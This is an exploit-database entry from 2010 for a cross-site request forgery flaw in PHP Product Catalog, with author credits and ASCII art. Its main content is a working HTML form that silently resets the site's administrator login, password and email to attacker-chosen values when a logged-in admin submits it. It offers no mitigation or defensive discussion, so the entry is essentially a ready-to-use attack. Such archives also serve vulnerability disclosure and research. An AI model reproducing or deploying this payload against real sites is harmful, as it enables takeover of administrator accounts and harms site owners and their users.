[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP Product Catalog CSRF Change Administrator Password
# Published : 2010-01-29
# Author : bi0
# Previous Title : dotProject 2.1.3 XSS and Improper Permissions
# Next Title : Joomla JReservation Blind SQL Injection Vulnerability
______ __ ______
/ == / / __
__< /
_____ _ _____
/_____/ /_/ /_____/
01000010 01101001 01001111
[#]----------------------------------------------------------------[#]
#
# [+] PHP Product Catalog - [ CSRF ] Change Administrator Password
#
# // Author Info
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Thanks: Pig,packetdeath,redking,sp1r1t and all my friends
# [x] IRC : irc.clickshqip.com / #itsecurity
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [ CSRF ]
#
# [ Login ]
# http://[server]/[path]/admin.php
#
# // Start CSRF
|-------------------------------------------------------------------------------|
<html>
<form action="http://[server]/admin.php?p=otherConfig&sOption=save" method="POST">
Admin : <input type="text" name="login" value="admin" size="5" /><br>
Passwd <input type="text" name="pass" value="123" size="5" /><br>
Email : <input type="text" name="email" value="test@example.com" size="16" /><br>
<input type="submit" name="save" value="Save">
</form>
</html>
|-------------------------------------------------------------------------------|
# // End of attack
#
[#]------------------------------------------------------------------------------------------[#]
#EOF